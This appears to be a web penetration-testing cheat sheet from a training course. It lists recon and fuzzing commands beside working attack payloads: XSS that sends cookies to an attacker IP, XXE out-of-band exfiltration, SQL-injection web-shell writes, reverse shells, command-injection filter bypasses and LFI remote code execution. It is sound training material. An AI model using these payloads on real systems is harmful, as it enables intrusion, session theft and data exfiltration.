# Web Sec Cheat Sheet

---

# WEB REQUESTS

## cURL

| **Command** | **Description** |
| --------------|-------------------|
| `curl -h` | cURL help menu |
| `curl inlanefreight.com` | Basic GET request |
| `curl -s -O inlanefreight.com/index.html` | Download file |
| `curl -k https://inlanefreight.com` | Skip HTTPS (SSL) certificate validation |
| `curl inlanefreight.com -v` | Print full HTTP request/response details |
| `curl -I https://www.inlanefreight.com` | Send HEAD request (only prints response headers) |
| `curl -i https://www.inlanefreight.com` | Print response headers and response body |
| `curl https://www.inlanefreight.com -A 'Mozilla/5.0'` | Set User-Agent header |
| `curl -u admin:admin http://<SERVER_IP>:<PORT>/` | Set HTTP basic authorization credentials |
| `curl http://admin:admin@<SERVER_IP>:<PORT>/` | Pass HTTP basic authorization credentials in the URL |
| `curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/` | Set request header |
| `curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'` | Pass GET parameters |
| `curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/` | Send POST request with POST data |
| `curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/` | Set request cookies |
| `curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php` | Send POST request with JSON data |

## APIs

| **Command** | **Description** |
| --------------|-------------------|
| `curl http://<SERVER_IP>:<PORT>/api.php/city/london` | Read entry |
| `curl -s http://<SERVER_IP>:<PORT>/api.php/city/ \| jq` | Read all entries |
| `curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'` | Create (add) entry |
| `curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'` | Update (modify) entry |
| `curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City` | Delete entry |

## Browser DevTools

| **Shortcut** | **Description** |
| --------------|-------------------|
| [`CTRL+SHIFT+I`] or [`F12`] | Show devtools |
| [`CTRL+SHIFT+E`] | Show Network tab |
| [`CTRL+SHIFT+K`] | Show Console tab |

# USING WEB PROXIES

## Burp Shortcuts

| **Shortcut** | **Description** |
| --------------|-------------------|
| [`CTRL+R`] | Send to repeater |
| [`CTRL+SHIFT+R`] | Go to repeater |
| [`CTRL+I`] | Send to intruder |
| [`CTRL+SHIFT+B`] | Go to intruder |
| [`CTRL+U`] | URL encode |
| [`CTRL+SHIFT+U`] | URL decode |

## ZAP Shortcuts

| **Shortcut** | **Description** |
| --------------|-------------------|
| [`CTRL+B`] | Toggle intercept on/off |
| [`CTRL+R`] | Go to replacer |
| [`CTRL+E`] | Go to encode/decode/hash |

## Firefox Shortcuts

| **Shortcut** | **Description** |
| --------------|-------------------|
| [`CTRL+SHIFT+R`] | Force refresh page |

# INFORMATION GATHERING - WEB EDITION

## WHOIS

| **Command** | **Description** |
|-|-|
| `export TARGET="domain.tld"` | Assign target to an environment variable. |
| `whois $TARGET` | WHOIS lookup for the target. |

---

## DNS Enumeration

| **Command** | **Description** |
|-|-|
| `nslookup $TARGET` | Identify the `A` record for the target domain. |
| `nslookup -query=A $TARGET` | Identify the `A` record for the target domain. |
| `dig $TARGET @<nameserver/IP>` | Identify the `A` record for the target domain. |
| `dig a $TARGET @<nameserver/IP>` | Identify the `A` record for the target domain. |
| `nslookup -query=PTR <IP>` | Identify the `PTR` record for the target IP address. |
| `dig -x <IP> @<nameserver/IP>` | Identify the `PTR` record for the target IP address. |
| `nslookup -query=ANY $TARGET` | Identify `ANY` records for the target domain. |
| `dig any $TARGET @<nameserver/IP>` | Identify `ANY` records for the target domain. |
| `nslookup -query=TXT $TARGET` | Identify the `TXT` records for the target domain. |
| `dig txt $TARGET @<nameserver/IP>` | Identify the `TXT` records for the target domain. |
| `nslookup -query=MX $TARGET` | Identify the `MX` records for the target domain. |
| `dig mx $TARGET @<nameserver/IP>` | Identify the `MX` records for the target domain. |

---

## Passive Subdomain Enumeration

| **Resource/Command** | **Description** |
|-|-|
| `VirusTotal` | [https://www.virustotal.com/gui/home/url](https://www.virustotal.com/gui/home/url) |
| `Censys` | [https://censys.io/](https://censys.io/) |
| `Crt.sh` | [https://crt.sh/](https://crt.sh/) |
| `curl -s https://sonar.omnisint.io/subdomains/{domain} \| jq -r '.[]' \| sort -u` | All subdomains for a given domain. |
| `curl -s https://sonar.omnisint.io/tlds/{domain} \| jq -r '.[]' \| sort -u` | All TLDs found for a given domain. |
| `curl -s https://sonar.omnisint.io/all/{domain} \| jq -r '.[]' \| sort -u` | All results across all TLDs for a given domain. |
| `curl -s https://sonar.omnisint.io/reverse/{ip} \| jq -r '.[]' \| sort -u` | Reverse DNS lookup on IP address. |
| `curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} \| jq -r '.[]' \| sort -u` | Reverse DNS lookup of a CIDR range. |
| `curl -s "https://crt.sh/?q=${TARGET}&output=json" \| jq -r '.[] \| "\(.name_value)\n\(.common_name)"' \| sort -u` | Certificate Transparency. |
| `cat sources.txt \| while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done` | Searching for subdomains and other information on the sources provided in the sources.txt list. |

#### Sources.txt

```txt
baidu
bufferoverun
crtsh
hackertarget
otx
projecdiscovery
rapiddns
sublist3r
threatcrowd
trello
urlscan
vhost
virustotal
zoomeye
```

---

## Passive Infrastructure Identification

| **Resource/Command** | **Description** |
|-|-|
| `Netcraft` | [https://www.netcraft.com/](https://www.netcraft.com/) |
| `WayBackMachine` | [http://web.archive.org/](http://web.archive.org/) |
| `WayBackURLs` | [https://github.com/tomnomnom/waybackurls](https://github.com/tomnomnom/waybackurls) |
| `waybackurls -dates https://$TARGET > waybackurls.txt` | Crawling URLs from a domain with the date it was obtained. |

---

## Active Infrastructure Identification

| **Resource/Command** | **Description** |
|-|-|
| `curl -I "http://${TARGET}"` | Display HTTP headers of the target webserver. |
| `whatweb -a https://www.facebook.com -v` | Technology identification. |
| `Wappalyzer` | [https://www.wappalyzer.com/](https://www.wappalyzer.com/) |
| `wafw00f -v https://$TARGET` | WAF fingerprinting. |
| `Aquatone` | [https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone) |
| `cat subdomain.list \| aquatone -out ./aquatone -screenshot-timeout 1000` | Makes screenshots of all subdomains in the subdomain.list. |

---

## Active Subdomain Enumeration

| **Resource/Command** | **Description** |
|-|-|
| `HackerTarget` | [https://hackertarget.com/zone-transfer/](https://hackertarget.com/zone-transfer/) |
| `SecLists` | [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) |
| `nslookup -type=any -query=AXFR $TARGET nameserver.target.domain` | Zone transfer using Nslookup against the target domain and its nameserver. |
| `gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"` | Bruteforcing subdomains. |

---

## Virtual Hosts

| **Resource/Command** | **Description** |
|-|-|
| `curl -s http://192.168.10.10 -H "Host: randomtarget.com"` | Changing the HOST HTTP header to request a specific domain. |
| `cat ./vhosts.list \| while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://<IP address> -H "HOST: ${vhost}.target.domain" \| grep "Content-Length: ";done` | Bruteforcing for possible virtual hosts on the target domain. |
| `ffuf -w ./vhosts -u http://<IP address> -H "HOST: FUZZ.target.domain" -fs 612` | Bruteforcing for possible virtual hosts on the target domain using `ffuf`. |

---

## Crawling

| **Resource/Command** | **Description** |
|-|-|
| `ZAP` | [https://www.zaproxy.org/](https://www.zaproxy.org/) |
| `ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt` | Discovering files and folders that cannot be spotted by browsing the website. |
| `ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS` | Mutated bruteforcing against the target web server. |

# ATTACKING WEB APPLICATIONS WITH FFUF

## Ffuf

| **Command** | **Description** |
| --------------|-------------------|
| `ffuf -h` | ffuf help |
| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ` | Directory Fuzzing |
| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ` | Extension Fuzzing |
| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php` | Page Fuzzing |
| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v` | Recursive Fuzzing |
| `ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/` | Sub-domain Fuzzing |
| `ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx` | VHost Fuzzing |
| `ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx` | Parameter Fuzzing - GET |
| `ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` | Parameter Fuzzing - POST |
| `ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` | Value Fuzzing |

## Wordlists

| **Command** | **Description** |
| --------------|-------------------|
| `/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt` | Directory/Page Wordlist |
| `/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt` | Extensions Wordlist |
| `/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt` | Domain Wordlist |
| `/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt` | Parameters Wordlist |

## Misc

| **Command** | **Description** |
| --------------|-------------------|
| `sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'` | Add DNS entry |
| `for i in $(seq 1 1000); do echo $i >> ids.txt; done` | Create Sequence Wordlist |
| `curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'` | curl w/ POST |

# JAVASCRIPT DEOBFUSCATION

## Commands

| **Command** | **Description** |
| --------------|-------------------|
| `curl http://SERVER_IP:PORT/` | cURL GET request |
| `curl -s http://SERVER_IP:PORT/ -X POST` | cURL POST request |
| `curl -s http://SERVER_IP:PORT/ -X POST -d "param1=sample"` | cURL POST request with data |
| `echo hackthebox \| base64` | base64 encode |
| `echo ENCODED_B64 \| base64 -d` | base64 decode |
| `echo hackthebox \| xxd -p` | hex encode |
| `echo ENCODED_HEX \| xxd -p -r` | hex decode |
| `echo hackthebox \| tr 'A-Za-z' 'N-ZA-Mn-za-m'` | rot13 encode |
| `echo ENCODED_ROT13 \| tr 'A-Za-z' 'N-ZA-Mn-za-m'` | rot13 decode |

## Deobfuscation Websites

| **Website** |
| ----------------------------------|
| [JS Console](https://jsconsole.com) |
| [Prettier](https://prettier.io/playground/) |
| [Beautifier](https://beautifier.io/) |
| [JSNice](http://www.jsnice.org/) |

## Misc

| **Command** | **Description** |
| --------------|-------------------|
| `ctrl+u` | Show HTML source code in Firefox |

# CROSS-SITE SCRIPTING (XSS)

## Commands

| Code | Description |
| ----- | ----- |
| **XSS Payloads** |
| `<script>alert(window.origin)</script>` | Basic XSS Payload |
| `<plaintext>` | Basic XSS Payload |
| `<script>print()</script>` | Basic XSS Payload |
| `<img src="" onerror=alert(window.origin)>` | HTML-based XSS Payload |
| `<script>document.body.style.background = "#141d2b"</script>` | Change Background Color |
| `<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>` | Change Background Image |
| `<script>document.title = 'HackTheBox Academy'</script>` | Change Website Title |
| `<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>` | Overwrite website's main body |
| `<script>document.getElementById('urlform').remove();</script>` | Remove certain HTML element |
| `<script src="http://OUR_IP/script.js"></script>` | Load remote script |
| `<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>` | Send Cookie details to us |
| **Commands** |
| `python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"` | Run `xsstrike` on a url parameter |
| `sudo nc -lvnp 80` | Start `netcat` listener |
| `sudo php -S 0.0.0.0:80` | Start `PHP` server |

# SQL INJECTION FUNDAMENTALS

## MySQL

| **Command** | **Description** |
| --------------|-------------------|
| **General** |
| `mysql -u root -h docker.hackthebox.eu -P 3306 -p` | login to mysql database |
| `SHOW DATABASES` | List available databases |
| `USE users` | Switch to database |
| **Tables** |
| `CREATE TABLE logins (id INT, ...)` | Add a new table |
| `SHOW TABLES` | List available tables in current database |
| `DESCRIBE logins` | Show table properties and columns |
| `INSERT INTO table_name VALUES (value_1,..)` | Add values to table |
| `INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)` | Add values to specific columns in a table |
| `UPDATE table_name SET column1=newvalue1, ... WHERE <condition>` | Update table values |
| **Columns** |
| `SELECT * FROM table_name` | Show all columns in a table |
| `SELECT column1, column2 FROM table_name` | Show specific columns in a table |
| `DROP TABLE logins` | Delete a table |
| `ALTER TABLE logins ADD newColumn INT` | Add new column |
| `ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn` | Rename column |
| `ALTER TABLE logins MODIFY oldColumn DATE` | Change column datatype |
| `ALTER TABLE logins DROP oldColumn` | Delete column |
| **Output** |
| `SELECT * FROM logins ORDER BY column_1` | Sort by column |
| `SELECT * FROM logins ORDER BY column_1 DESC` | Sort by column in descending order |
| `SELECT * FROM logins ORDER BY column_1 DESC, id ASC` | Sort by two columns |
| `SELECT * FROM logins LIMIT 2` | Only show first two results |
| `SELECT * FROM logins LIMIT 1, 2` | Only show first two results starting from index 2 |
| `SELECT * FROM table_name WHERE <condition>` | List results that meet a condition |
| `SELECT * FROM logins WHERE username LIKE 'admin%'` | List results where the name is similar to a given string |

## MySQL Operator Precedence

* Division (`/`), Multiplication (`*`), and Modulus (`%`)
* Addition (`+`) and Subtraction (`-`)
* Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`)
* NOT (`!`)
* AND (`&&`)
* OR (`||`)

## SQL Injection

| **Payload** | **Description** |
| --------------|-------------------|
| **Auth Bypass** |
| `admin' or '1'='1` | Basic Auth Bypass |
| `admin')-- -` | Basic Auth Bypass With comments |
| [Auth Bypass Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass) |
| **Union Injection** |
| `' order by 1-- -` | Detect number of columns using `order by` |
| `cn' UNION select 1,2,3-- -` | Detect number of columns using Union injection |
| `cn' UNION select 1,@@version,3,4-- -` | Basic Union injection |
| `UNION select username, 2, 3, 4 from passwords-- -` | Union injection for 4 columns |
| **DB Enumeration** |
| `SELECT @@version` | Fingerprint MySQL with query output |
| `SELECT SLEEP(5)` | Fingerprint MySQL with no output |
| `cn' UNION select 1,database(),2,3-- -` | Current database name |
| `cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -` | List all databases |
| `cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -` | List all tables in a specific database |
| `cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -` | List all columns in a specific table |
| `cn' UNION select 1, username, password, 4 from dev.credentials-- -` | Dump data from a table in another database |
| **Privileges** |
| `cn' UNION SELECT 1, user(), 3, 4-- -` | Find current user |
| `cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -` | Find if user has admin privileges |
| `cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -` | Find all user privileges |
| `cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -` | Find which directories can be accessed through MySQL |
| **File Injection** |
| `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read local file |
| `select 'file written successfully!' into outfile '/var/www/html/proof.txt'` | Write a string to a local file |
| `cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -` | Write a web shell into the base web directory |

# SQLMAP ESSENTIALS

| **Command** | **Description** |
| ------------------------------------------------------------ | ----------------------------------------------------------- |
| `sqlmap -h` | View the basic help menu |
| `sqlmap -hh` | View the advanced help menu |
| `sqlmap -u "http://www.example.com/vuln.php?id=1" --batch` | Run `SQLMap` without asking for user input |
| `sqlmap 'http://www.example.com/' --data 'uid=1&name=test'` | `SQLMap` with POST request |
| `sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'` | POST request specifying an injection point with an asterisk |
| `sqlmap -r req.txt` | Passing an HTTP request file to `SQLMap` |
| `sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'` | Specifying a cookie header |
| `sqlmap -u www.target.com --data='id=1' --method PUT` | Specifying a PUT request |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt` | Store traffic to an output file |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch` | Specify verbosity level |
| `sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"` | Specifying a prefix or suffix |
| `sqlmap -u www.example.com/?id=1 -v 3 --level=5` | Specifying the level and risk |
| `sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba` | Basic DB enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --tables -D testdb` | Table enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname` | Table/row enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"` | Conditional enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --schema` | Database schema enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --search -T user` | Searching for data |
| `sqlmap -u "http://www.example.com/?id=1" --passwords --batch` | Password enumeration and cracking |
| `sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"` | Anti-CSRF token bypass |
| `sqlmap --list-tampers` | List all tamper scripts |
| `sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba` | Check for DBA privileges |
| `sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"` | Reading a local file |
| `sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"` | Writing a file |
| `sqlmap -u "http://www.example.com/?id=1" --os-shell` | Spawning an OS shell |

---

# COMMAND INJECTIONS

## Injection Operators

| **Injection Operator** | **Injection Character** | **URL-Encoded Character** | **Executed Command** |
|-|-|-|-|
| Semicolon | `;` | `%3b` | Both |
| New Line | `\n` | `%0a` | Both |
| Background | `&` | `%26` | Both (second output generally shown first) |
| Pipe | `\|` | `%7c` | Both (only second output is shown) |
| AND | `&&` | `%26%26` | Both (only if first succeeds) |
| OR | `\|\|` | `%7c%7c` | Second (only if first fails) |
| Sub-Shell | ``` `` ``` | `%60%60` | Both (Linux-only) |
| Sub-Shell | `$()` | `%24%28%29` | Both (Linux-only) |

---

## Linux

### Filtered Character Bypass

| Code | Description |
| ----- | ----- |
| `printenv` | Can be used to view all environment variables |
| **Spaces** |
| `%09` | Using tabs instead of spaces |
| `${IFS}` | Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. `$()`) |
| `{ls,-la}` | Commas will be replaced with spaces |
| **Other Characters** |
| `${PATH:0:1}` | Will be replaced with `/` |
| `${LS_COLORS:10:1}` | Will be replaced with `;` |
| `$(tr '!-}' '"-~'<<<[)` | Shift character by one (`[` -> `\`) |

---

### Blacklisted Command Bypass

| Code | Description |
| ----- | ----- |
| **Character Insertion** |
| `'` or `"` | Total must be even |
| `$@` or `\` | Linux only |
| **Case Manipulation** |
| `$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")` | Execute command regardless of cases |
| `$(a="WhOaMi";printf %s "${a,,}")` | Another variation of the technique |
| **Reversed Commands** |
| `echo 'whoami' \| rev` | Reverse a string |
| `$(rev<<<'imaohw')` | Execute reversed command |
| **Encoded Commands** |
| `echo -n 'cat /etc/passwd \| grep 33' \| base64` | Encode a string with base64 |
| `bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)` | Execute b64 encoded string |

---

## Windows

### Filtered Character Bypass

| Code | Description |
| ----- | ----- |
| `Get-ChildItem Env:` | Can be used to view all environment variables - (PowerShell) |
| **Spaces** |
| `%09` | Using tabs instead of spaces |
| `%PROGRAMFILES:~10,-5%` | Will be replaced with a space - (CMD) |
| `$env:PROGRAMFILES[10]` | Will be replaced with a space - (PowerShell) |
| **Other Characters** |
| `%HOMEPATH:~0,-17%` | Will be replaced with `\` - (CMD) |
| `$env:HOMEPATH[0]` | Will be replaced with `\` - (PowerShell) |

---

### Blacklisted Command Bypass

| Code | Description |
| ----- | ----- |
| **Character Insertion** |
| `'` or `"` | Total must be even |
| `^` | Windows only (CMD) |
| **Case Manipulation** |
| `WhoAmi` | Simply send the command with mixed case |
| **Reversed Commands** |
| `"whoami"[-1..-20] -join ''` | Reverse a string |
| `iex "$('imaohw'[-1..-20] -join '')"` | Execute reversed command |
| **Encoded Commands** |
| `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))` | Encode a string with base64 |
| `iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"` | Execute b64 encoded string |

# FILE UPLOAD ATTACKS

## Web Shells

| **Web Shell** | **Description** |
| --------------|-------------------|
| `<?php file_get_contents('/etc/passwd'); ?>` | Basic PHP File Read |
| `<?php system('hostname'); ?>` | Basic PHP Command Execution |
| `<?php system($_REQUEST['cmd']); ?>` | Basic PHP Web Shell |
| `<% eval request('cmd') %>` | Basic ASP Web Shell |
| `msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php` | Generate PHP reverse shell |
| [PHP Web Shell](https://github.com/Arrexel/phpbash) | PHP Web Shell |
| [PHP Reverse Shell](https://github.com/pentestmonkey/php-reverse-shell) | PHP Reverse Shell |
| [Web/Reverse Shells](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells) | List of Web Shells and Reverse Shells |

## Bypasses

| **Command** | **Description** |
| --------------|-------------------|
| **Client-Side Bypass** |
| `[CTRL+SHIFT+C]` | Toggle Page Inspector |
| **Blacklist Bypass** |
| `shell.phtml` | Uncommon Extension |
| `shell.pHp` | Case Manipulation |
| [PHP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst) | List of PHP Extensions |
| [ASP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP) | List of ASP Extensions |
| [Web Extensions](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt) | List of Web Extensions |
| **Whitelist Bypass** |
| `shell.jpg.php` | Double Extension |
| `shell.php.jpg` | Reverse Double Extension |
| `%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…` | Character Injection - Before/After Extension |
| **Content/Type Bypass** |
| [Web Content-Types](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt) | List of Web Content-Types |
| [Content-Types](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt) | List of All Content-Types |
| [File Signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) | List of File Signatures/Magic Bytes |

## Limited Uploads

| **Potential Attack** | **File Types** |
| --------------|-------------------|
| `XSS` | HTML, JS, SVG, GIF |
| `XXE`/`SSRF` | XML, SVG, PDF, PPT, DOC |
| `DoS` | ZIP, JPG, PNG |

# LOGIN BRUTE FORCING

## Hydra

| **Command** | **Description** |
| --------------|-------------------|
| `hydra -h` | hydra help |
| `hydra -C wordlist.txt SERVER_IP -s PORT http-get /` | Basic Auth Brute Force - Combined Wordlist |
| `hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get /` | Basic Auth Brute Force - User/Pass Wordlists |
| `hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"` | Login Form Brute Force - Static User, Pass Wordlist |
| `hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4` | SSH Brute Force - User/Pass Wordlists |
| `hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1` | FTP Brute Force - Static User, Pass Wordlist |

## Wordlists

| **Command** | **Description** |
| --------------|-------------------|
| `/opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt` | Default Passwords Wordlist |
| `/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt` | Common Passwords Wordlist |
| `/opt/useful/SecLists/Usernames/Names/names.txt` | Common Names Wordlist |

## Misc

| **Command** | **Description** |
| --------------|-------------------|
| `cupp -i` | Creating Custom Password Wordlist |
| `sed -ri '/^.{,7}$/d' william.txt` | Remove Passwords Shorter Than 8 |
| ```sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt``` | Remove Passwords With No Special Chars |
| `sed -ri '/[0-9]+/!d' william.txt` | Remove Passwords With No Numbers |
| `./username-anarchy Bill Gates > bill.txt` | Generate Usernames List |
| `ssh b.gates@SERVER_IP -p PORT` | SSH to Server |
| `ftp 127.0.0.1` | FTP to Server |
| `su - user` | Switch to User |

# BROKEN AUTHENTICATION

## Fuzz

| **Command** | **Description** |
| --------------|-------------------|
| `wfuzz -z file,/path/to/wordlist.txt -u http://127.0.0.1:80/site/FUZZ` | Fuzz using a wordlist |
| `wfuzz -z file,/path/to/user.txt -z file,/path/to/pass.txt http://127.0.0.1/login.php -d "user=FUZZ&pass=FUZ2Z"` | Fuzz using POST method and two wordlists |
| `wfuzz -H Foo:FUZZ` | Fuzz header |
| `-X GET`, `-X POST` | Choose method |

## Grep

| **Command** | **Description** |
| --------------|-------------------|
| `grep '[[:classname:]]' file.txt` | Find strings that contain a given class. Classes are: `[[:graph:]]`, `[[:lower:]]`, `[[:print:]]`, `[[:punct:]]`, `[[:space:]]`, `[[:upper:]]`, and `[[:xdigit:]]` |
| `grep -x '.\{123\}'` | Find strings with length of 123 |

## Misc

| **Command** | **Description** |
| --------------|-------------------|
| `echo -n academy \| xxd -p` | Convert ASCII to hex |
| `echo -n 61636164656d79 \| xxd -r -p` | Convert hex to ASCII |

## Resource

| **Site name** | **Description** |
| ----------------|-------------------|
| CyberChef | https://gchq.github.io/CyberChef |
| Decodify | https://github.com/s0md3v/Decodify |

# WEB ATTACKS

## HTTP Verb Tampering

`HTTP Method`

- `HEAD`
- `PUT`
- `DELETE`
- `OPTIONS`
- `PATCH`

| **Command** | **Description** |
| --------------|-------------------|
| `-X OPTIONS` | Set HTTP Method with Curl |

## IDOR

`Identify IDORS`

- In `URL parameters & APIs`
- In `AJAX Calls`
- By `understanding reference hashing/encoding`
- By `comparing user roles`

| **Command** | **Description** |
| --------------|-------------------|
| `md5sum` | MD5 hash a string |
| `base64` | Base64 encode a string |

## XXE

| **Code** | **Description** |
| --------------|-------------------|
| `<!ENTITY xxe SYSTEM "http://localhost/email.dtd">` | Define External Entity to a URL |
| `<!ENTITY xxe SYSTEM "file:///etc/passwd">` | Define External Entity to a file path |
| `<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">` | Read PHP source code with base64 encode filter |
| `<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">` | Reading a file through a PHP error |
| `<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">` | Reading a file through OOB exfiltration |

# FILE INCLUSION

## Local File Inclusion

| **Command** | **Description** |
| --------------|-------------------|
| **Basic LFI** |
| `/index.php?language=/etc/passwd` | Basic LFI |
| `/index.php?language=../../../../etc/passwd` | LFI with path traversal |
| `/index.php?language=/../../../etc/passwd` | LFI with name prefix |
| `/index.php?language=./languages/../../../../etc/passwd` | LFI with approved path |
| **LFI Bypasses** |
| `/index.php?language=....//....//....//....//etc/passwd` | Bypass basic path traversal filter |
| `/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64` | Bypass filters with URL encoding |
| `/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]` | Bypass appended extension with path truncation (obsolete) |
| `/index.php?language=../../../../etc/passwd%00` | Bypass appended extension with null byte (obsolete) |
| `/index.php?language=php://filter/read=convert.base64-encode/resource=config` | Read PHP with base64 filter |

## Remote Code Execution

| **Command** | **Description** |
| --------------|-------------------|
| **PHP Wrappers** |
| `/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id` | RCE with data wrapper |
| `curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"` | RCE with input wrapper |
| `curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"` | RCE with expect wrapper |
| **RFI** |
